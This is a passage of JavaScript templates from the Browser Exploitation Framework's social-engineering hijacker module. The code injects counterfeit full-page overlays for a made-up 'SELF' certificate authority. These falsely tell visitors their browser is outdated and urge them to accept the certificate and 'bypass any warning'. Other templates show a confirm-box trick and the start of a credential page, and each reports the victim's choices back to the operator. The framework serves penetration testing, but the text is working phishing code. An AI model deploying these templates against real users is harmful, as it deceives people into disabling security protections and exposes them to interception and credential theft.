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" alt="SSL Error Icon" onmousedown="return false"></div><div style="margin: 0px 77px 0px; font-size:18pt; line-height: 140%; margin-bottom:6pt; font-weight:bold; color:#660000">Please accept our new SELF&#174;-Signed Certificate to ensure maximum security protection.</div><div style="margin:0px 80px 0px">'+domain+' chose SELF&#174; to protect your security. If your browser raise any warning after this one it means that it\'s not up-to-date. Accept this certificate then please consider updating your browser as soon as possible.<br><br>SELF&#174; - to make the Internet a safer place.</div><div style="margin:0px 80px 0px"></div><div style="margin:0px 80px 0px"><form style="margin:15px 5px 15px 0px;padding:0px"><input type=button value=continue name=back onclick="forward()"></form></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_short><a href="#" onclick="toggleMoreInfo(false); return false" onmousedown="return false"><img id=twisty_closed src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAANklEQVR42q3QMQoAMAgEwfz/05dcoVcEYQuFwWYL8Uhqb+Q9+WLDcYFxwDhgHDjev3n/z96TCxE/Ie1QsznxAAAAAElFTkSuQmCC" border=0 style=display:none><img id=twisty_closed_rtl src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMklEQVQY02P4jwcwMDCg8vEpJEoxTCFBxcgK8SpGV4hTMTaF1DGZZDeTHBokhzOuGAQAxQt2mANh8/IAAAAASUVORK5CYII=" border=0 style=display:none><span i18n-content=moreInfoTitle style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_long style=display:none><a href="#" onclick="toggleMoreInfo(true); return false" onmousedown="return false"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMUlEQVQY02P4//8/A7GYgXaKgeA/0Riqg6BCFGcQUojhZnwKsXoQl0KcoYFNIW3DGQCkVyHtwOU6YQAAAABJRU5ErkJggg==" border=0><span style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a><p i18n-values=.innerHTML:moreInfo1>Security Enhanced Layer Factory&#174;: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF&#174; help people as customer or seller to feel safe by issuing SELF&#174;-signed certificate that are build to last. With SELF&#174; you will never be harmed again - Trust is our workship.</p><p i18n-values=.innerHTML:moreInfo2>Security Enhanced Layer Factory&#174;, SELF&#174; and SELF&#174; logo are registered trademarks.</p></div></div></td></table>'; toggleMoreInfo(true); setDirectionSensitiveImages(); } forward = function(){ send("User continuing to "+target); timer=setTimeout(function(){window.location = target;},500); } getDomain = function(url){ return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2]; } function $(o) {return document.getElementById(o);} sendCommand = function(cmd) { window.domAutomationController.setAutomationId(1); window.domAutomationController.send(cmd); } toggleMoreInfo = function(collapse) { if (collapse) { $("more_info_long").style.display = "none"; $("more_info_short").style.display = "block"; } else { $("more_info_long").style.display = "block"; $("more_info_short").style.display = "none"; } } setDirectionSensitiveImages = function () { if (document.documentElement.dir == 'rtl') { $("twisty_closed_rtl").style.display = "inline"; } else { $("twisty_closed").style.display = "inline"; } } target = $j(this).attr('href'); domain = getDomain(target); $j(document).attr('title', domain+" Security Enhanced Layer Factory&#174; certificate acceptance"); writediv();
JavaScript
beef/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
/* * Copyright (c) 2006-2023Wade Alcorn - [email protected] * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ getDomain = function(url){ return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2]; } toggleMoreInfo = function(collapse) { if (collapse) { $("more_info_long").style.display = "none"; $("more_info_short").style.display = "block"; } else { $("more_info_long").style.display = "block"; $("more_info_short").style.display = "none"; } } setDirectionSensitiveImages = function () { if (document.documentElement.dir == 'rtl') { $("twisty_closed_rtl").style.display = "inline"; } else { $("twisty_closed").style.display = "inline"; } } target = $j(this).attr('href'); domain = getDomain(target); //Assets warning = '<img src="data:image/png;base64,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" onmousedown="return false">'; backgreen = '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAJFCAIAAACTIQqNAAAAAXNSR0IArs4c6QAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9wJGA4GE+nvoKcAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAA4UlEQVRIx71VWxLDIAhc1iP0AD1mTy/bD2Njph1j0OaDSUTeC4jH60kAQ0QYAdChwzlMNMJVvpXn2u9AAj7nI0BmiVImCMIrzyipkdnPVd4sUZZpSp+4jzqFLxNNVbbkLmvkdPR1H4lAW3cSyATSdp9LPSpuQT8y0LT3UZxKnJK+8AlTMK8z3zXnUflWDz6an1Hyrdf4+e/avppfMxO/bYpwDMV7htulHmn3RgfDXkwtRqvmT+JkP47OwQo7/TmD25/3T1o+l0WXk/ug3YcB7Bis/8yOnelfv39/hv368nfyDcZnjfUPcK3LAAAAAElFTkSuQmCC" width="100%" height="100%" onmousedown="return false;">'; backred = '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAJFCAIAAACTIQqNAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAQRJREFUSMe9lVtyxTAIQyUW0C10v9306Qd+NNNeYyfT+8EkEwRIBpz4+vgMSYU5nyYsB+R3u4orzArRnr0OComwHRKBFO7132IOmwCFpUDJY3AdGLVzoL1nnHDIBHLGN8w8L4f4kc8ORBgPHJdab7TRi86fa39IrnrKD1I3tNniZq7kOThylgcpfNGX83aaQ2p9X+mg9VV9hza50mps6KP3cKNHF+yOzlbbQ/OKb+5vpRHyTnnF84TjqLXQjVjPbZuFCjf1b/BaYKbv9eywUYeHPDK/F5i1H1HORaVjz/8bk/+HeV9xqH3GV7z+7lGVu9qZ+szOff8Vy8b+39H5JPZuzELHNyoGruezaO1kAAAAAElFTkSuQmCC" width="100%" height="100%" onmousedown="return false;">'; locker = '<img style="margin:16px;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABwAAAAcCAIAAAD9b0jDAAAESElEQVRIia1VTWhcVRg93533ZiaTZJyEJq1t0x+lpVXqRltEhSK2FikoVN24EAvitkhc14VUhCK4ciXSCi4U+kM3RjAoWhsRqQuFaLX+BEmq/UlsTCeTefccF/e+9yZd9y7uffPe3POde75zv88k4U6PJCxX5+fe/fjopZlvbravVBIAMEAAoLDkq+KjyheShpt379j88CuHjq1prQdgkv6c+/XI8adcutBsuUbD0tTgyu1AOIyEAkpS8VYAvEe3S6fW6y9NbFq3IwHw/tk3Xfrv6LpKa8j6GuYqZtZD0ExSoC6aJAbGggQBkkhk3paX5s+cf+PIcx8mAH747YvmsLWG7K4hV60aTAaDCTJAMBSyi5BA5TMjLgQS1dRmrn8eNe36xUZ/pd5naRVmQgRDoCjJZ8y6IAXBTFaBOYNCPEHxJJUUSpYiqKsgSVBJYEE6A0xmkESPbaOHto4c2Di8W9Lvc99Oz3wyPXu62sckBRwAMEohg5xTBDWTAQZZyLqFtIpeuzePP7rzNUmSSN2/5eDOzQcnpjZ9/dPbjSaqdYMTIAa6UlAqiT6RJCPkAIMAENo+8uwjO8bnb85OTp28cPEMgD27nt6758X9e8avXL38y7VTA84lNZhWGyIeQMiFESymlJm2rHlS0uTUiVMTb11f/Pm/7NLkxeNffnfSU9vHDizeYGeJzJSzFCFKEVQ9HozBDD7T+uHdpKYunq32oTXiRsbcyJi79Pc5kls3PNRe4nJb9EQOKgZmSFAYLiopwAR5L3qRElRv2OCQDQ4bhCQzT5Fa6ShbofdWyfVj9HCuqSjKQgZlAJVlpOhJ7+WpbpfLbZNQp0h6sttRtyPfhaqIekaiBVMpXkTBKHo98+DJ/vooqWOvnqdERgOE58H+0ZefP/HR5OGVFVRqMBeIRVBXZp8qNO92ec/afeGYYSblSU8yn3dt33/rJjtt+awQFD2aKvATKXOAkGUlqfD/XqbKf7aX1GmznplVEK2Kwqelc02UGYKOt6FQ0mrQbgdZV/TBieXxkwKSAgkzyaBMJAuU2/nmtiQlmnzIc+nIpJAUAgWDIHiuZrqaIEtfIlApEEumkCCLF8Ji7ellGvkGiViCBhWpWMBWgUqgRMATgMxA3Z6oHqzcKaH05YlG/im/pqWXJEag6ZlPWY4YgMxPIH3/42dpXc717M2rec6Uysu4RMDh9IXDN+a4eEPLt+Kn6JOQBEO1rv4hS+swF1NS3PUEQF9tEFwMNzdGM9X60Bq1+gB8BgoW21EMbIBLkNZRa8gqKIpfmgxE0Ae27b187VyWWUaElueckioaTdQaYMhhtLMFLU2CmVXkHJyLFEntHNsXW/Qfs9NH33uiNrgw0ESaxkZSSJ935bInF0tZ1wBSNTc8fuirjWvuC+0X1xZmP5gY/2vhwrL/p+K0Ciff2qNbbxQAajbW3bv2sRcef2docENkijs9/ge36MK8f8CaUgAAAABJRU5ErkJggg==" alt="SSL SELF Icon" onmousedown="return false">'; textGreen = '<b>'+domain+'</b> chose SELF&#174; to protect your security. If your browser raises any warning when continuing it means that it\'s not up-to-date. <b>Accept</b> this certificate then please consider updating your browser as soon as possible.<br><br>SELF&#174; - to make the Internet a safer place.'; textRed = 'Your browser raised a warning because it is not up to date. As <b>'+domain+'</b> chose SELF&#174; to protect your security you need to <b>ACCEPT</b> this certificate to view its content then please consider update your browser as soon as possible. When your browser will be up to date, it will <b>accept</b> SELF&#174;-signed certificates. Please <b>bypass any warning</b> until then.<br><br>SELF&#174; - to make the Internet a safer place.'; arrows = '<div style="margin:0px 80px 0px"></div><div style="margin:0px 80px 0px"><form style="margin:15px 5px 15px 0px;padding:0px"><input type=button value=continue name=back onclick="forward()"></form></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_short><a href="#" onclick="toggleMoreInfo(false); return false" onmousedown="return false"><img id=twisty_closed src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAANklEQVR42q3QMQoAMAgEwfz/05dcoVcEYQuFwWYL8Uhqb+Q9+WLDcYFxwDhgHDjev3n/z96TCxE/Ie1QsznxAAAAAElFTkSuQmCC" border=0 style=display:none><img id=twisty_closed_rtl src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMklEQVQY02P4jwcwMDCg8vEpJEoxTCFBxcgK8SpGV4hTMTaF1DGZZDeTHBokhzOuGAQAxQt2mANh8/IAAAAASUVORK5CYII=" border=0 style=display:none><span i18n-content=moreInfoTitle style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_long style=display:none><a href="#" onclick="toggleMoreInfo(true); return false" onmousedown="return false"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMUlEQVQY02P4//8/A7GYgXaKgeA/0Riqg6BCFGcQUojhZnwKsXoQl0KcoYFNIW3DGQCkVyHtwOU6YQAAAABJRU5ErkJggg==" border=0><span style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a><p i18n-values=.innerHTML:moreInfo1>Security Enhanced Layer Factory&#174;: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF&#174; help people as customer or seller to feel safe by issuing SELF&#174;-signed certificate that are build to last. With SELF&#174; you will never be harmed again - Trust is our workship.</p><p i18n-values=.innerHTML:moreInfo2>Security Enhanced Layer Factory&#174;, SELF&#174; and SELF&#174; logo are registered trademarks.</p></div>'; buildtpl = function(target, background, icon, text, addarrows){ tpl='<div style="position:absolute;width:100%;height:100%;">'+background+'</div><table width="100%" cellspacing=0 cellpadding=0><td style=padding:40px valign=middle align=center><div style="width:60%; background-color:white; color:black; font-size:10pt; line-height:16pt; text-align:left; padding:20px; position:relative; -webkit-box-shadow:3px 3px 8px #200; border-radius:5px"><div style=position:absolute>'+icon+'</div><div style="margin: 0px 77px 0px; font-size:18pt; line-height: 140%; margin-bottom:6pt; font-weight:bold; color:#660000">Please accept our new SELF&#174;-Signed Certificate to ensure maximum security protection.</div><div style="margin:0px 80px 0px">'+text+'</div>'; if(addarrows){ tpl = tpl + arrows+'</div></td></table>'; target.innerHTML = tpl; toggleMoreInfo(true); setDirectionSensitiveImages(); }else{ tpl = tpl + '</div></td></table>'; target.innerHTML = tpl; } } forward = function(){ send("User continuing to "+target); timer=setTimeout(function(){timer2=setTimeout(function(){buildtpl(sneakydiv, backred, warning, textRed, true);},400);window.location = target;},500); } function $(o) {return document.getElementById(o);} sendCommand = function(cmd) { window.domAutomationController.setAutomationId(1); window.domAutomationController.send(cmd); } $j(document).attr('title', domain+" Security Enhanced Layer Factory&#174; certificate acceptance"); imgbootstrap = document.createElement('div'); imgbootstrap.setAttribute('style','display:none'); document.body.appendChild(imgbootstrap); document.body.removeChild(imgbootstrap); buildtpl(imgbootstrap, backred, warning, textRed, false) sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'background'); sneakydiv.setAttribute('oncontextmenu','return false;'); sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#13771f; font-family:Helvetica,Arial,sans-serif; margin:0px;'); document.body.appendChild(sneakydiv); buildtpl(sneakydiv, backgreen, locker, textGreen, true);
JavaScript
beef/modules/social_engineering/simple_hijacker/templates/confirmbox.js
/* * Copyright (c) 2006-2023 Wade Alcorn - [email protected] * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ var answer = confirm("Do you really want to leave us ??") if (answer){ alert("Okay :(") send("User chose to leave."); window.location = $j(this).attr('href'); } else{ alert("Okay enjoy ") send("User chose to stay."); }
JavaScript
beef/modules/social_engineering/simple_hijacker/templates/credential.js
/* * Copyright (c) 2006-2023Wade Alcorn - [email protected] * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ imgr = 'data:image/png;base64,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